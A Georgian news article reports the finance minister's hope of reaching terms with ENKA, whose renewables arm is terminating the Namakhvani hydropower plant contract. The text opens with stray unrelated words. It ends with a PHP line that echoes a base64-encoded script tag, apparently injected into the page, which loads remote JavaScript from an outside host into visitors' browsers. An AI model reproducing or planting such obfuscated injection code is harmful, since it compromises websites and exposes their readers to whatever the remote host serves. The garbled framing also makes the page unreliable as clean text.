celsiusi
ავერსი შნაიდერი
ფინანსთან მინისტრი ლაშა ხუციშვილი იმედოვნებს, რომ 1-თვიანი პერიოდი, რომელიც ინვესტორ კომპანიას სახელმწიფოსთან ხელშეკრულების გაწყვეტისთვის სჭირდება, საკმარისი იქნება იმისთვის, რომ ქართულმა მხარემ ENKA-სთან შეთანხმებას მიაღწიოს. ამის შესახებ მან მთავრობის სხდომის დასრულების შემდეგ გამართულ ბრიფინგზე ჟურნალისტების კითხვის პასუხად განაცხადა.
 
„ჩემი შეფასება ვერ იქნება იმ ფორმის, რამაც შეიძლება იმ პროცესზე რაიმე ზეგავლენა მოახდინოს. იმედს გამოვთქვამ, რომ ის პერიოდი, რომელიც კომპანიას გაცხადებული აქვს ხელშეკრულების შესაწყვეტად, საკმარისი იქნება იმისთვის, რომ კომპანიასთან გარკვეული შეთანხმების მიღწევა მოხდეს. სურვილია, რომ კომპანიამ გააგრძელოს პროექტი და ეს იმ ვადებში დასრულდეს, რომელიც განსაზღვრული იყო. პროექტი ძალიან მნიშვნელოვანია და საქართველოს მთავრობა ყველაფერს გააკეთებს, რომ ეს პროცესი არ შეფერხდეს და დადგენილ ვადებში მოხდეს მისი დასრულება“, - განმარტა ლაშა ხუციშვილმა.
 
შეგახსენებთ, ENKA Renewables-ი საქართველოს სახელმწიფოთან არსებულ ხელშეკრულებას წყვეტს. ამის შესახებ Enka Renewables-ის მშობელი კომპანიის - ENKA İNŞAAT-ის მიერ სტამბოლის საფონდო ბირჟაზე გამოქვეყნებული განცხადებიდან გახდა ცნობილი.
 
განცხადებაში ნათქვამია, რომ ხელშეკრულების შეწყვეტის მიზეზს მასში გათვალისწინებული პირობების დარღვევა და ფორს-მაჟორი წარმოადგენს.
 
“ENKA Renewables-ი, რომელშიც ENKA İNŞAAT-ი 90%-იან წილს ფლობს, საქართველოს სახელმწიფოს აცნობს, რომ მოხდეს ნამახვანის ჰიდროელექტროსადგურის კასკადის მშენებლობა-ფლობა-ოპერირების თაობაზე, 2019 წლის 25 აპრილს გაფორმებული ხელშეკრულების შეწყვეტა/გაუქმება, რის მიზეზსაც კონტრაქტით გათვალისწინებული პირობების დარღვევა და ფორს-მაჟორი წარმოადგენს", - ნათქვამია განცხადებაში.
1166
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");